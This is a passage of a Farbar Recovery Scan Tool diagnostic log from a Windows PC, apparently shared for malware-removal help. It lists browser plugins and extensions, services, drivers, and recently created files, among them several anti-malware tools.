ShellIconOverlayIdentifiers: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  No File
ShellIconOverlayIdentifiers: [!AsusWSShellExt_B] -> {6D4133E5-0742-4ADC-8A8C-9303440F7190} => C:\Program Files (x86)\ASUS\WebStorage Sync Agent\1.1.18.159\ASUSWSShellExt64.dll (ASUS Cloud Corporation.)
ShellIconOverlayIdentifiers: [!AsusWSShellExt_O] -> {64174815-8D98-4CE6-8646-4C039977D808} => C:\Program Files (x86)\ASUS\WebStorage Sync Agent\1.1.18.159\ASUSWSShellExt64.dll (ASUS Cloud Corporation.)
ShellIconOverlayIdentifiers: [!AsusWSShellExt_U] -> {1C5AB7B1-0B38-4EC4-9093-7FD277E2AF4D} => C:\Program Files (x86)\ASUS\WebStorage Sync Agent\1.1.18.159\ASUSWSShellExt64.dll (ASUS Cloud Corporation.)
ShellIconOverlayIdentifiers-x32: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  No File
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKU\S-1-5-21-3865632982-2122395147-3624827403-1002\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://asus13.msn.com
HKU\S-1-5-21-3865632982-2122395147-3624827403-1002\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\ssv.dll (Oracle Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\jp2ssv.dll (Oracle Corporation)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1 205.171.2.25
 
FireFox:
========
FF ProfilePath: C:\Users\JWT\AppData\Roaming\Mozilla\Firefox\Profiles\u3ip9ptp.default
FF SelectedSearchEngine: Google
FF Homepage: about:home
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_16_0_0_235.dll ()
FF Plugin: @mcafee.com/MSC,version=10 -> C:\Program Files\mcafee\msc\npMcSnFFPl64.dll No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_16_0_0_235.dll ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll (Google, Inc.)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=3.5.29 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.25.2 -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.25.2 -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @mcafee.com/MSC,version=10 -> C:\Program Files (x86)\McAfee\msc\npMcSnFFPl.dll No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3505.0912 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.1.2 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin HKU\S-1-5-21-3865632982-2122395147-3624827403-1002: @octoshape.com/Octoshape Streaming Services,version=1.0 -> C:\Users\JWT\AppData\Roaming\Octoshape\Octoshape Streaming Services\sua-1312180-0-npoctoshape.dll (Octoshape ApS)
FF Plugin HKU\S-1-5-21-3865632982-2122395147-3624827403-1002: @tools.google.com/Google Update;version=3 -> C:\Users\JWT\AppData\Local\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKU\S-1-5-21-3865632982-2122395147-3624827403-1002: @tools.google.com/Google Update;version=9 -> C:\Users\JWT\AppData\Local\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\JWT\AppData\Roaming\mozilla\plugins\npoctoshape.dll (Octoshape ApS)
FF Extension: Hola Better Internet - C:\Users\JWT\AppData\Roaming\Mozilla\Firefox\Profiles\u3ip9ptp.default\Extensions\jid1-4P0kohSJxU1qGg@jetpack [2014-12-17]
FF Extension: FireShot - C:\Users\JWT\AppData\Roaming\Mozilla\Firefox\Profiles\u3ip9ptp.default\Extensions\{0b457cAA-602d-484a-8fe7-c1d894a011ba} [2014-12-29]
FF Extension: Easy Screenshot - C:\Users\JWT\AppData\Roaming\Mozilla\Firefox\Profiles\u3ip9ptp.default\Extensions\easyscreenshot@mozillaonline.com.xpi [2014-06-05]
FF Extension: YouTube Video and Audio Downloader - C:\Users\JWT\AppData\Roaming\Mozilla\Firefox\Profiles\u3ip9ptp.default\Extensions\feca4b87-3be4-43da-a1b1-137c24220968@jetpack.xpi [2014-08-16]
FF Extension: Awesome screenshot: Capture and Annotate - C:\Users\JWT\AppData\Roaming\Mozilla\Firefox\Profiles\u3ip9ptp.default\Extensions\jid0-GXjLLfbCoAx0LcltEdFrEkQdQPI@jetpack.xpi [2014-06-05]
FF Extension: Download Status Bar - C:\Users\JWT\AppData\Roaming\Mozilla\Firefox\Profiles\u3ip9ptp.default\Extensions\{6c28e999-e900-4635-a39d-b1ec90ba0c0f}.xpi [2014-03-04]
FF Extension: Adblock Plus - C:\Users\JWT\AppData\Roaming\Mozilla\Firefox\Profiles\u3ip9ptp.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2014-03-04]
FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK
 
Chrome: 
=======
CHR HomePage: Default -> hxxp://www.google.com/
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR DefaultSuggestURL: Default -> {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client={google:suggestClient}&gs_ri={google:suggestRid}&xssi=t&q={searchTerms}&{google:inputType}{google:cursorPosition}{google:currentPageUrl}{google:pageClassification}{google:searchVersion}{google:sessionToken}{google:prefetchQuery}sugkey={google:suggestAPIKeyParameter}
CHR Profile: C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Translate) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapbdbdomjkkjkaonfhkkikfgjllcleb [2014-01-31]
CHR Extension: (Magic Actions for YouTube™) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\abjcfabbhafbcdfjoecdgepllmpfceif [2014-01-31]
CHR Extension: (Awesome Screenshot: Capture & Annotate) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\alelhddbbhepgpmgidjdcjakblofbmce [2014-05-10]
CHR Extension: (Google Docs) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-01-31]
CHR Extension: (Google Drive) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-01-31]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-22]
CHR Extension: (Turn Off the Lights) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\bfbmjmiodbnnpllbbbfblcplfjjepjdn [2014-01-31]
CHR Extension: (WOT) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\bhmmomiinigofkjcapegjjndpbikblnp [2014-01-31]
CHR Extension: (YouTube) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-01-31]
CHR Extension: (Google Cast) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\boadgeojelhgndaghljhdicfkmllpafd [2014-12-05]
CHR Extension: (Videostream for Google Chromecast™) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\cnciopoikihiagdjbjpnocolokfelagl [2014-12-21]
CHR Extension: (Google Search) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-01-31]
CHR Extension: (Google Calendar) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejjicmeblgpmajnghnpcppodonldlgfn [2014-01-31]
CHR Extension: (HTTPS Everywhere) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\gcbommkclmclpchllfjekcdonpmejbdp [2014-01-31]
CHR Extension: (Mail Checker Plus for Google Mail™) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\gffjhibehnempbkeheiccaincokdjbfe [2014-01-31]
CHR Extension: (AdBlock) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2014-01-31]
CHR Extension: (Pixlr Editor) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\icmaknaampgiegkcjlimdiidlhopknpk [2014-05-26]
CHR Extension: (Google Play Music) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\icppfcnhkcmnfdhfhphakoifcfokfdhg [2014-01-31]
CHR Extension: (Disconnect) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\jeoacafpbcihiomhlakheieifhpjdfeo [2014-01-31]
CHR Extension: (Downloads) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\jfchnphgogjhineanplmfkofljiagjfb [2014-01-31]
CHR Extension: (Pixlr Touch Up) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\jklljiahjgoglchglekebfljnmbaleig [2014-05-26]
CHR Extension: (Speed Dial 2) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\jpfpebmajhhopeonhlcgidhclcccjcik [2014-02-24]
CHR Extension: (Google Voice (by Google)) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\kcnhkahnjcbndmmehfkdnkjomaanaooo [2014-01-31]
CHR Extension: (Download Master) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcceagdollnkjlogmdckgjakjapmkdjf [2014-01-31]
CHR Extension: (Google Mail Checker) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\mihcahmgecmbnbcchbopgniflfhgnkff [2014-01-31]
CHR Extension: (AutoPager Chrome) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\mmgagnmbebdebebbcleklifnobamjonh [2014-01-31]
CHR Extension: (Google Wallet) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-01-31]
CHR Extension: (Docs PDF/PowerPoint Viewer (by Google)) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\nnbmlagghjjcbdhgmkedmbmedengocbn [2014-01-31]
CHR Extension: (Click&Clean App) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\pdabfienifkbhoihedcgeogidfmibmhp [2014-01-31]
CHR Extension: (Send from Gmail (by Google)) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\pgphcomnlaojlmmcjmiddhdapjpbgeoc [2014-01-31]
CHR Extension: (Evernote Web Clipper) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\pioclpoplcdbaefihamjohnefbikjilc [2014-01-31]
CHR Extension: (Gmail) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-01-31]
 
==================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 !SASCORE; C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE [172344 2014-08-21] (SUPERAntiSpyware.com)
R2 ASUS InstantOn; C:\Program Files\ASUS\P4G\InsOnSrv.exe [277120 2013-07-23] (ASUS)
R2 Asus WebStorage Windows Service; C:\Program Files (x86)\ASUS\WebStorage Sync Agent\1.1.18.159\AsusWSWinService.exe [72192 2012-12-19] () [File not signed]
R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [319104 2014-01-24] (Windows ® Win 7 DDK provider)
S2 CLKMSVC10_38F51D56; C:\Program Files (x86)\CyberLink\PowerDVD10\NavFilter\kmsvc.exe [247768 2013-04-24] (CyberLink)
R2 ETDService; C:\Program Files\Elantech\ETDService.exe [99664 2013-04-10] (ELAN Microelectronics Corp.)
R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1148560 2014-12-12] (NVIDIA Corporation)
R2 Intel® Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [733696 2013-05-11] (Intel® Corporation) [File not signed]
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [822232 2013-05-11] (Intel® Corporation)
R2 Intel® ME Service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe [131544 2013-06-23] (Intel Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [169432 2013-06-23] (Intel Corporation)
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1701520 2014-12-12] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [19823248 2014-12-12] (NVIDIA Corporation)
R2 PaceLicenseDServices; C:\Program Files (x86)\Common Files\PACE\Services\LicenseServices\LDSvc.exe [2938880 2012-05-18] (PACE Anti-Piracy, Inc.) [File not signed]
R2 Qualcomm Atheros Killer Service V2; C:\Program Files\Qualcomm Atheros\Network Manager\KillerService.exe [342016 2013-09-04] (Qualcomm Atheros) [File not signed]
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [368632 2014-09-21] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23792 2014-09-21] (Microsoft Corporation)
R2 ZAtheros Bt and Wlan Coex Agent; C:\Program Files (x86)\Bluetooth Suite\Ath_CoexAgent.exe [323584 2014-01-24] (Atheros) [File not signed]
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 akw8x64; C:\Windows\system32\DRIVERS\akw8x64.sys [3812048 2013-05-30] (Qualcomm Atheros, Inc.)
S1 BfLwf; C:\Windows\system32\DRIVERS\bwcW8x64.sys [75056 2013-02-13] (Qualcomm Atheros, Inc.)
R3 BTATH_LWFLT; C:\Windows\system32\DRIVERS\btath_lwflt.sys [77464 2014-01-24] (Qualcomm Atheros)
R3 BthLEEnum; C:\Windows\System32\drivers\BthLEEnum.sys [226304 2013-12-04] (Microsoft Corporation)
S3 cleanhlp; C:\EEK\bin\cleanhlp64.sys [57024 2014-08-20] (Emsisoft GmbH)
S3 DGUSBAP; C:\Windows\system32\DRIVERS\dgmbx2.sys [194864 2011-02-13] (Avid Technology, Inc.)
S3 GeneStor; C:\Windows\System32\drivers\GeneStor.sys [91368 2013-03-21] (GenesysLogic)
S3 HipShieldK; C:\Windows\System32\drivers\HipShieldK.sys [197264 2012-05-28] (McAfee, Inc.)
R3 kbfiltr; C:\Windows\System32\drivers\kbfiltr.sys [14992 2012-08-01] ( )
S3 MBX2DFU; C:\Windows\SYSTEM32\DRIVERS\dgmbx2fu.sys [32944 2011-02-13] (Avid Technology, Inc.)
S3 mfencbdc; C:\Windows\system32\DRIVERS\mfencbdc.sys [328976 2012-11-02] (McAfee, Inc.)
S3 mfencrk; C:\Windows\system32\DRIVERS\mfencrk.sys [97208 2012-11-02] (McAfee, Inc.)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [19600 2014-12-12] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [38032 2014-11-22] (NVIDIA Corporation)
R2 plctrl; C:\Program Files\ASUS\P4G\plctrl.sys [14136 2013-07-23] (Windows ® Win 7 DDK provider)
R1 SASDIFSV; C:\Program Files\SUPERAntiSpyware\SASDIFSV64.SYS [14928 2011-07-22] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
R1 SASKUTIL; C:\Program Files\SUPERAntiSpyware\SASKUTIL64.SYS [12368 2011-07-12] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
R3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114496 2014-09-21] (Microsoft Corporation)
U3 swmidi; No ImagePath
 
==================== NetSvcs (Whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-12-30 07:21 - 2014-12-30 07:21 - 00028476 _____ () C:\Users\JWT\Desktop\FRST.txt
2014-12-30 07:20 - 2014-12-30 07:21 - 00000000 ____D () C:\FRST
2014-12-30 07:20 - 2014-12-30 07:17 - 02123264 _____ (Farbar) C:\Users\JWT\Desktop\FRST64.exe
2014-12-30 01:08 - 2014-12-30 01:08 - 00000000 _____ () C:\WINDOWS\setuperr.log
2014-12-30 01:08 - 2014-12-30 01:08 - 00000000 _____ () C:\WINDOWS\setupact.log
2014-12-30 00:45 - 2014-12-30 01:07 - 00129752 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2014-12-30 00:45 - 2014-12-30 00:45 - 00001080 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-12-30 00:45 - 2014-12-30 00:45 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-12-30 00:45 - 2014-12-30 00:45 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-12-30 00:45 - 2014-11-21 06:14 - 00093400 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2014-12-30 00:45 - 2014-11-21 06:14 - 00064216 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
2014-12-30 00:45 - 2014-11-21 06:14 - 00025816 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mbam.sys
2014-12-29 21:07 - 2014-12-30 01:06 - 00001860 _____ () C:\WINDOWS\PFRO.log
2014-12-29 20:31 - 2014-12-29 20:31 - 00000000 _____ () C:\Users\JWT\Downloads\rkill64.exe
2014-12-29 20:07 - 2014-12-29 20:07 - 00017466 _____ () C:\Users\JWT\Documents\bc.txt
2014-12-28 19:18 - 2014-12-28 19:18 - 00448512 _____ (OldTimer Tools) C:\Users\JWT\Downloads\TFC.exe
2014-12-28 19:03 - 2014-12-28 19:03 - 02173952 _____ () C:\Users\JWT\Downloads\AdwCleaner.exe
2014-12-23 13:57 - 2014-12-23 13:57 - 01940728 _____ (Bleeping Computer, LLC) C:\Users\JWT\Desktop\rkill.exe
2014-12-21 20:53 - 2014-12-21 20:53 - 00196096 _____ () C:\Users\JWT\Downloads\VideostreamNetworkRepair.exe
2014-12-17 20:33 - 2014-12-17 20:33 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox
2014-12-16 22:23 - 2014-11-22 04:46 - 00038032 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvvad64v.sys
2014-12-16 22:23 - 2014-11-22 04:46 - 00032400 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvaudcap32v.dll
2014-12-16 12:51 - 2014-12-16 12:51 - 00000000 __SHD () C:\Users\JWT\AppData\Local\EmieBrowserModeList
2014-12-14 09:25 - 2014-12-14 09:25 - 00076776 _____ () C:\Users\JWT\Downloads\FLVPlayer-Chrome.exe
2014-12-10 22:45 - 2014-11-03 14:25 - 00615568 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvStreaming.exe
2014-12-10 12:15 - 2014-11-21 21:13 - 25059840 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2014-12-10 12:15 - 2014-11-21 20:50 - 00580096 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2014-12-10 12:15 - 2014-11-21 20:49 - 02885120 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2014-12-10 12:15 - 2014-11-21 20:49 - 00417280 _____ (Microsoft Corporation) C:\WINDOWS\system32\html.iec
2014-12-10 12:15 - 2014-11-21 20:48 - 00088064 _____ (Microsoft Corporation) C:\WINDOWS\system32\MshtmlDac.dll
2014-12-10 12:15 - 2014-11-21 20:35 - 00812544 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
2014-12-10 12:15 - 2014-11-21 20:34 - 06039552 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2014-12-10 12:15 - 2014-11-21 20:22 - 19749376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2014-12-10 12:15 - 2014-11-21 20:08 - 00092160 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2014-12-10 12:15 - 2014-11-21 20:07 - 00501248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2014-12-10 12:15 - 2014-11-21 20:06 - 00340992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\html.iec
2014-12-10 12:15 - 2014-11-21 20:06 - 00145408 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll
2014-12-10 12:15 - 2014-11-21 20:05 - 00316928 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
2014-12-10 12:15 - 2014-11-21 20:05 - 00064000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MshtmlDac.dll
2014-12-10 12:15 - 2014-11-21 20:01 - 02277888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2014-12-10 12:15 - 2014-11-21 19:59 - 01032704 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcomm.dll
2014-12-10 12:15 - 2014-11-21 19:55 - 00661504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
2014-12-10 12:15 - 2014-11-21 19:52 - 00262144 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll
2014-12-10 12:15 - 2014-11-21 19:49 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2014-12-10 12:15 - 2014-11-21 19:49 - 00718848 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2014-12-10 12:15 - 2014-11-21 19:49 - 00373760 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2014-12-10 12:15 - 2014-11-21 19:46 - 02125312 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2014-12-10 12:15 - 2014-11-21 19:43 - 14412800 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2014-12-10 12:15 - 2014-11-21 19:35 - 00076288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
2014-12-10 12:15 - 2014-11-21 19:34 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iepeers.dll
2014-12-10 12:15 - 2014-11-21 19:33 - 00285696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
2014-12-10 12:15 - 2014-11-21 19:29 - 04299264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2014-12-10 12:15 - 2014-11-21 19:29 - 00880128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcomm.dll
2014-12-10 12:15 - 2014-11-21 19:28 - 02358272 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2014-12-10 12:15 - 2014-11-21 19:25 - 00230400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll
2014-12-10 12:15 - 2014-11-21 19:23 - 00688640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2014-12-10 12:15 - 2014-11-21 19:23 - 00326656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2014-12-10 12:15 - 2014-11-21 19:22 - 02052096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2014-12-10 12:15 - 2014-11-21 19:15 - 01548288 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2014-12-10 12:15 - 2014-11-21 19:13 - 12836864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2014-12-10 12:15 - 2014-11-21 19:03 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2014-12-10 12:15 - 2014-11-21 19:00 - 01888256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2014-12-10 12:15 - 2014-11-21 18:56 - 01307136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2014-12-10 12:15 - 2014-11-21 18:54 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2014-12-10 12:15 - 2014-11-06 22:16 - 01762840 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2014-12-10 12:15 - 2014-11-06 21:26 - 01489072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2014-12-10 12:15 - 2014-10-30 16:37 - 00129536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\poqexec.exe
2014-12-10 12:15 - 2014-10-30 16:34 - 00146432 _____ (Microsoft Corporation) C:\WINDOWS\system32\poqexec.exe
2014-12-10 12:15 - 2014-10-12 20:43 - 00238912 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys
2014-12-10 12:15 - 2014-10-12 20:43 - 00153920 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys
2014-12-10 12:15 - 2014-10-12 20:43 - 00086336 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pdc.sys
2014-12-10 12:15 - 2014-10-12 20:43 - 00039744 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\intelpep.sys
2014-12-06 09:15 - 2014-12-06 09:15 - 00000000 ____D () C:\Users\JWT\Downloads\searchable
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-12-30 07:20 - 2014-01-31 22:40 - 00000000 ____D () C:\Users\JWT\AppData\Local\CrashDumps
